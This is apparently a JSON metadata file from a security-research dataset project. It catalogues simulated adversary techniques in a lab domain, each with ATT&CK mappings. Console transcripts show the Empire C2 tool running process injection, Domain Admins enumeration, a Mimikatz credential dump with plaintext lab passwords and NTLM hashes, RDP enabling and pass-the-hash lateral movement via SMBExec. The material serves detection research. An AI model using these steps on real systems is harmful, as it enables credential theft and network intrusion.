Execution"], "description": "This 
dataset represents adversaries reflectively loading/intecting a portable executable (PE) (not on disk) into a process via WriteprocessMemory and executed via CreateRemoteThread APIs", "attack_mappings": [{"technique": "T1055", "sub-technique": "003", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_psinject_PEinjection.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "PSInject", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/management/Invoke-PSInject.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "[*] Active agents:\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n62HY9XCK ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 3172 5/0.0 2020-08-07 14:30:45 http \nF82SZKVW ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6008 5/0.0 2020-08-07 18:31:11 http \n\n(Empire: agents) > interact F82SZKVW\n(Empire: F82SZKVW) > \n(Empire: F82SZKVW) > \n(Empire: F82SZKVW) > usemodule management/psinject\n(Empire: powershell/management/psinject) > \n(Empire: powershell/management/psinject) > set ProcName notepad\n(Empire: powershell/management/psinject) > set Listener http\n(Empire: powershell/management/psinject) > info\n\n Name: Invoke-PSInject\n Module: powershell/management/psinject\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @harmj0y\n @sixdub\n leechristensen (@tifkin_)\n\nDescription:\n Utilizes Powershell to to inject a Stephen Fewer formed\n ReflectivePick which executes PS codefrom memory in a remote\n process. 
ProcID or ProcName must be specified.\n\nComments:\n http://sixdub.net\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True F82SZKVW Agent to run module on. \n ProcId False ProcessID to inject into. \n ProcName False notepad Process name to inject into. \n Listener True http Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). 
\n\n(Empire: powershell/management/psinject) > execute\n[*] Tasked F82SZKVW to run TASK_CMD_JOB\n[*] Agent F82SZKVW tasked with task ID 1\n[*] Tasked agent F82SZKVW to run module powershell/management/psinject\n(Empire: powershell/management/psinject) > \nJob started: F48GDZ\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent Y9RCLV64 checked in\n[+] Initial agent Y9RCLV64 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to Y9RCLV64 at 172.18.39.5\n\n(Empire: powershell/management/psinject) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n62HY9XCK ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 3172 5/0.0 2020-08-07 14:30:45 http \nF82SZKVW ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6008 5/0.0 2020-08-07 18:32:51 http \nY9RCLV64 ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo notepad 2576 5/0.0 2020-08-07 18:32:52 http \n\n(Empire: agents) >"}, "references": ["https://powersploit.readthedocs.io/en/latest/CodeExecution/Invoke-ReflectivePEInjection/", "https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick#psinjectps1"]}, "SDWIN-190518201207": {"title": "Empire Shell Net Domain Admins", "id": "SDWIN-190518201207", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Domain Groups Enumeration", "RPC SAMR SamrQueryInformationGroup"], "description": "This dataset represents adversaries enumerating members of domain groups (i.e. Domain Admins) via RPC SAMR interface over SMB. 
Some of the main RPC methods captured over the network are SamrLookupNamesInDomain (Opnum 17) and SamrQueryInformationGroup (Opnum 20) where there are indicators about the specific group name enumerated.", "attack_mappings": [{"technique": "T1069", "sub-technique": "002", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_rpc_samr_smb_group_domain_admins_standard_user.zip"}, {"type": "network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_shell_rpc_samr_smb_group_domain_admins_standard_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}], "permissions_required": ["User"], "adversary_view": "(Empire: stager/multi/launcher) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent GM4LN8V9 checked in\n[+] Initial agent GM4LN8V9 from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to GM4LN8V9 at 172.18.39.6\nagents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http \n\nGM4LN8V9 ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 5724 5/0.0 2020-09-21 08:05:25 http \n\n(Empire: agents) > interact GM4LN8V9\n(Empire: GM4LN8V9) > shell net group \"Domain Admins\" /domain\n[*] Tasked GM4LN8V9 to run TASK_SHELL\n[*] Agent GM4LN8V9 tasked with task ID 1\n(Empire: GM4LN8V9) > \nThe request 
will be processed at a domain controller for domain theshire.local.\n\nGroup name Domain Admins\nComment Designated administrators of the domain\n\nMembers\n\n-------------------------------------------------------------------------------\nmscott pgustavo wardog \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: GM4LN8V9) >"}, "references": null}, "SDWIN-190518201922": {"title": "Empire WDigest Downgrade", "id": "SDWIN-190518201922", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Registry Modification", "Windows Registry WDigest"], "description": "This dataset represents adversaries setting the UseLogonCredential property value from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest key to 1 to enable plain text passwords.", "attack_mappings": [{"technique": "T1112", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "WDigest Downgrade", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190510202010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_wdigest_downgrade.tar.gz"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "wdigest_downgrade", "script": "https://github.com/EmpireProject/Empire/blob/dev/lib/modules/powershell/management/wdigest_downgrade.py"}], "permissions_required": ["Administrator"], "adversary_view": null}, "references": null}, "SDWIN-190518202151": {"title": "Empire Mimikatz LogonPasswords", "id": "SDWIN-190518202151", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["LSASS Memory Credentials Read"], 
"description": "This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "LSASS Access from Non System Account", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_logonpasswords.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "credentials", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n62HY9XCK ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 3172 5/0.0 2020-08-07 14:30:45 http \nB7Y8G4XC ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 1648 5/0.0 2020-08-07 14:31:46 http \n\n(Empire: agents) > interact B7Y8G4XC\n(Empire: B7Y8G4XC) > \n(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/logonpasswords*\n(Empire: powershell/credentials/mimikatz/logonpasswords) > info\n\n Name: Invoke-Mimikatz DumpCreds\n Module: powershell/credentials/mimikatz/logonpasswords\n NeedsAdmin: True\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @JosephBialek\n @gentilkiwi\n\nDescription:\n Runs PowerSploit's Invoke-Mimikatz function to extract\n plaintext credentials from memory.\n\nComments:\n http://clymb3r.wordpress.com/ 
http://blog.gentilkiwi.com\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True B7Y8G4XC Agent to run module on. \n\n(Empire: powershell/credentials/mimikatz/logonpasswords) > execute\n[*] Tasked B7Y8G4XC to run TASK_CMD_JOB\n[*] Agent B7Y8G4XC tasked with task ID 1\n[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/logonpasswords\n(Empire: powershell/credentials/mimikatz/logonpasswords) > \nJob started: FH5UKE\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882\n\n .#####. mimikatz 2.2.0 (x64) #19041 Aug 4 2020 20:16:54\n.## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # sekurlsa::logonpasswords\n\nAuthentication Id : 0 ; 2868007 (00000000:002bc327)\nSession : RemoteInteractive from 2\nUser Name : pgustavo\nDomain : THESHIRE\nLogon Server : MORDORDC\nLogon Time : 8/5/2020 9:46:24 PM\nSID : S-1-5-21-1363495622-3806888128-621328882-1104\n msv :\n [00000003] Primary\n * Username : pgustavo\n * Domain : THESHIRE\n * NTLM : 81d310fa34e6a56a31145445891bb7b8\n * SHA1 : 2a953d745ed80427e309d957d20b0eeca3cd3d69\n * DPAPI : be8815c8ec59ddeda43d2301dbc29c2c\n tspkg :\n wdigest :\n * Username : pgustavo\n * Domain : THESHIRE\n * Password : W1n1!2019\n kerberos :\n * Username : pgustavo\n * Domain : THESHIRE.LOCAL\n * Password : (null)\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 2860578 (00000000:002ba622)\nSession : RemoteInteractive from 2\nUser Name : pgustavo\nDomain : THESHIRE\nLogon Server : MORDORDC\nLogon Time : 8/5/2020 9:46:24 PM\nSID : S-1-5-21-1363495622-3806888128-621328882-1104\n msv :\n [00000003] Primary\n * Username : pgustavo\n * Domain : THESHIRE\n * NTLM : 
81d310fa34e6a56a31145445891bb7b8\n * SHA1 : 2a953d745ed80427e309d957d20b0eeca3cd3d69\n * DPAPI : be8815c8ec59ddeda43d2301dbc29c2c\n tspkg :\n wdigest :\n * Username : pgustavo\n * Domain : THESHIRE\n * Password : W1n1!2019\n kerberos :\n * Username : pgustavo\n * Domain : THESHIRE.LOCAL\n * Password : (null)\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 2778269 (00000000:002a649d)\nSession : Interactive from 2\nUser Name : DWM-2\nDomain : Window Manager\nLogon Server : (null)\nLogon Time : 8/5/2020 9:46:21 PM\nSID : S-1-5-90-0-2\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 2776485 (00000000:002a5da5)\nSession : Interactive from 2\nUser Name : DWM-2\nDomain : Window Manager\nLogon Server : (null)\nLogon Time : 8/5/2020 9:46:21 PM\nSID : S-1-5-90-0-2\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman 
:\n cloudap :\n\nAuthentication Id : 0 ; 2771168 (00000000:002a48e0)\nSession : Interactive from 2\nUser Name : UMFD-2\nDomain : Font Driver Host\nLogon Server : (null)\nLogon Time : 8/5/2020 9:46:20 PM\nSID : S-1-5-96-0-2\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 997 (00000000:000003e5)\nSession : Service from 0\nUser Name : LOCAL SERVICE\nDomain : NT AUTHORITY\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:08 PM\nSID : S-1-5-19\n msv :\n tspkg :\n wdigest :\n * Username : (null)\n * Domain : (null)\n * Password : (null)\n kerberos :\n * Username : (null)\n * Domain : (null)\n * Password : (null)\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 56937 (00000000:0000de69)\nSession : Interactive from 1\nUser Name : DWM-1\nDomain : Window Manager\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:08 PM\nSID : S-1-5-90-0-1\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : 
\"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 56865 (00000000:0000de21)\nSession : Interactive from 1\nUser Name : DWM-1\nDomain : Window Manager\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:08 PM\nSID : S-1-5-90-0-1\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 996 (00000000:000003e4)\nSession : Service from 0\nUser Name : WORKSTATION5$\nDomain : THESHIRE\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:07 PM\nSID : S-1-5-20\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : workstation5$\n * Domain : THESHIRE.LOCAL\n * Password : (null)\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 33194 (00000000:000081aa)\nSession : Interactive from 0\nUser Name : UMFD-0\nDomain : Font Driver Host\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:07 PM\nSID : S-1-5-96-0-0\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 
57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 33086 (00000000:0000813e)\nSession : Interactive from 1\nUser Name : UMFD-1\nDomain : Font Driver Host\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:07 PM\nSID : S-1-5-96-0-1\n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : WORKSTATION5$\n * Domain : theshire.local\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 31553 (00000000:00007b41)\nSession : UndefinedLogonType from 0\nUser Name : (null)\nDomain : (null)\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:07 PM\nSID : \n msv :\n [00000003] Primary\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * NTLM : 57ac24b9ba3b6f79dda7f900c75f467b\n * SHA1 : 8e553476906ead53af282b88aae47d9a6593e9f7\n tspkg :\n wdigest :\n kerberos :\n ssp :\n credman :\n cloudap :\n\nAuthentication Id : 0 ; 999 (00000000:000003e7)\nSession : UndefinedLogonType from 0\nUser Name : WORKSTATION5$\nDomain : THESHIRE\nLogon Server : (null)\nLogon Time : 8/5/2020 9:26:06 
PM\nSID : S-1-5-18\n msv :\n tspkg :\n wdigest :\n * Username : WORKSTATION5$\n * Domain : THESHIRE\n * Password : \"\\TOW)%Li-i'd(En7Y*9%gD?Db90nd1:Xkg&ftIvG2=:+^9l4*'K!X51y1_.I0Yi;z<+:$\"qJMD1V]Bo]+DFnghOJsCJ6bV7BUNMIe[]>r^9n;$4]IsA'na8\n kerberos :\n * Username : workstation5$\n * Domain : THESHIRE.LOCAL\n * Password : (null)\n ssp :\n credman :\n cloudap :\n\nmimikatz(powershell) # exit\nBye!\n\n(Empire: powershell/credentials/mimikatz/logonpasswords) >"}, "references": null}, "SDWIN-190518203650": {"title": "Empire Enable RDP", "id": "SDWIN-190518203650", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Registry Modification", "Windows Registry RDP Settings"], "description": "This dataset represents adversaries enabling RDP and adding a firewall exception to a compromised system", "attack_mappings": [{"technique": "T1112", "sub-technique": null, "tactics": ["TA0005"]}], "notebooks": null, "datasets": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_enable_rdp.tar.gz"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "management", "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: TKV35P8X) > usemodule management/enable_rdp* \n(Empire: powershell/management/enable_rdp) > info\n\n Name: Enable-RDP\n Module: powershell/management/enable_rdp\n NeedsAdmin: True\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @harmj0y\n\nDescription:\n Enables RDP on the remote machine and adds a firewall\n exception.\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- 
-----------\n Agent True TKV35P8X Agent to run module on. \n\n(Empire: powershell/management/enable_rdp) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked TKV35P8X to run TASK_CMD_WAIT\n[*] Agent TKV35P8X tasked with task ID 21\n[*] Tasked agent TKV35P8X to run module powershell/management/enable_rdp\n(Empire: powershell/management/enable_rdp) > The operation completed successfully.\n(Empire: powershell/management/enable_rdp) >"}, "references": null}, "SDWIN-190518210125": {"title": "Empire Invoke SMBExec", "id": "SDWIN-190518210125", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC CreateService", "RPC StartService", "SMB Svcctl"], "description": "This dataset represents adversaries remotely creating and starting a service via RPC methods over SMB named pipes such as svcctl.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_smbexec_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_smbexec_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "invoke_smbexec", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/lateral_movement/Invoke-SMBExec.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: 7ADX8ZVR) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 
5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http \n7ADX8ZVR ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 8948 5/0.0 2020-09-20 06:34:21 http \n\n\n(Empire: agents) > interact 7ADX8ZVR\n(Empire: 7ADX8ZVR) > usemodule lateral_movement/invoke_smbexec\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 81d310fa34e6a56a31145445891bb7b8\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain theshire\n(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http\n(Empire: powershell/lateral_movement/invoke_smbexec) > info\n\n Name: Invoke-SMBExec\n Module: powershell/lateral_movement/invoke_smbexec\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @rvrsh3ll\n\nDescription:\n Executes a stager on remote hosts using SMBExec.ps1. This\n module requires a username and NTLM hash\n\nComments:\n https://raw.githubusercontent.com/Kevin-Robertson/Invoke-\n TheHash/master/Invoke-SMBExec.ps1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 7ADX8ZVR Agent to run module on. \n CredID False CredID from the store to use. \n ComputerName True WORKSTATION6.theshire.lo Host[s] to execute the stager on, comma \n cal separated. \n Username True pgustavo Username. \n Domain False theshire Domain. \n Hash True 81d310fa34e6a56a31145445 NTLM Hash in LM:NTLM or NTLM format. \n 891bb7b8 \n Service False Name of service to create and delete. \n Defaults to 20 char random. \n Listener False http Listener to use. \n Command False Custom command to run. \n Obfuscate False False Switch. 
Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/lateral_movement/invoke_smbexec) > execute\n[*] Tasked 7ADX8ZVR to run TASK_CMD_WAIT\n[*] Agent 7ADX8ZVR tasked with task ID 3\n[*] Tasked agent 7ADX8ZVR to run module powershell/lateral_movement/invoke_smbexec\n(Empire: powershell/lateral_movement/invoke_smbexec) > \nCommand executed with service PGUJLOAKFQFVOMHGFQPX on WORKSTATION6.theshire.local\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent 3KL8YRUB checked in\n[+] Initial agent 3KL8YRUB from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to 3KL8YRUB at 